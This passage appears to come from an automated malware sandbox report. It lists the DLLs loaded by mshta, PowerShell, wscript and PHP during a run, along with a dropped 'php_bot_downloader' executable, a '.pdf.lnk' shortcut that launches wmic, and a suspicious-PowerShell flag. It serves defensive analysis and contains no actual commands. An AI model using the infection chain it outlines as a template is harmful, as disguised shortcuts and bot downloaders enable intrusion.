        Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: wininet.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: iertutil.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: winhttp.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: mswsock.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: winnsi.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: urlmon.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: srvcli.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: netutils.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: fwpuclnt.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: propsys.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: edputil.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: wintypes.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: appresolver.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: bcp47langs.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: slc.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: userenv.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: sppc.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: pcacli.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: mpr.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: sfc_os.dll
        Source: C:\Windows\System32\tar.exeSection loaded: archiveint.dll
        Source: C:\Windows\System32\tar.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\tar.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: php8ts.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: vcruntime140.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: vcruntime140.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: napinsp.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: pnrpnsp.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: wshbth.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: nlaapi.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: mswsock.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: winrnr.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: php8ts.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: vcruntime140.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: mswsock.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
        Source: HateSpeech2024_Summary.pdf.lnk.bin.lnkLNK file: ..\..\..\Windows\System32\Wbem\wmic.exe
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php8ts.pdb source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp
        Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000005.00000003.1677761143.000001EB131FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840765627.000001EB1396A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840765627.000001EB139C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1839341806.000001EB13A67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840318424.000001EB1395B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842211450.000001EB13116000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1679419864.000001EB131FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1843243271.000001EB13118000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1841460930.000001EB0EFB4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840586133.000001EB13968000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1841125562.000001EB1315A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842473193.000001EB138C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1841348809.000001EB13071000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1839954374.000001EB15CC1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840963450.000001EB139FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842138558.000001EB0EFA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842172300.000001EB0EFAA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php.pdb source: php.exe, 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 00000018.00000000.2016553083.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 0000001C.00000000.2188454449.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 0000001C.00000002.2894997934.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php_pdo_mysql.pdb source: php_pdo_mysql.dll.21.dr
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php_mysqli.pdb source: php_mysqli.dll.21.dr
        Source: Binary string: sethc.pdb source: mshta.exe, 00000005.00000003.1677761143.000001EB131FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840765627.000001EB139C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842211450.000001EB13116000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1679419864.000001EB131FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1843243271.000001EB13118000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842473193.000001EB138C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1841348809.000001EB13071000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842138558.000001EB0EFA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842172300.000001EB0EFAA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php.pdb"""UGP source: php.exe, 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 00000018.00000000.2016553083.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 0000001C.00000000.2188454449.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 0000001C.00000002.2894997934.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
        Source: Binary string: 1D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php8ts.pdb source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmp, php.exe, 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp, php.exe, 0000001C.00000002.2896990047.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmp, php.exe, 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp, php.exe, 0000001C.00000002.2896990047.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php_sysvshm.pdb source: php_sysvshm.dll.21.dr
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php_zend_test.pdb source: php_zend_test.dll.21.dr

        Data Obfuscation

        barindex
        Suspicious powershell command line found
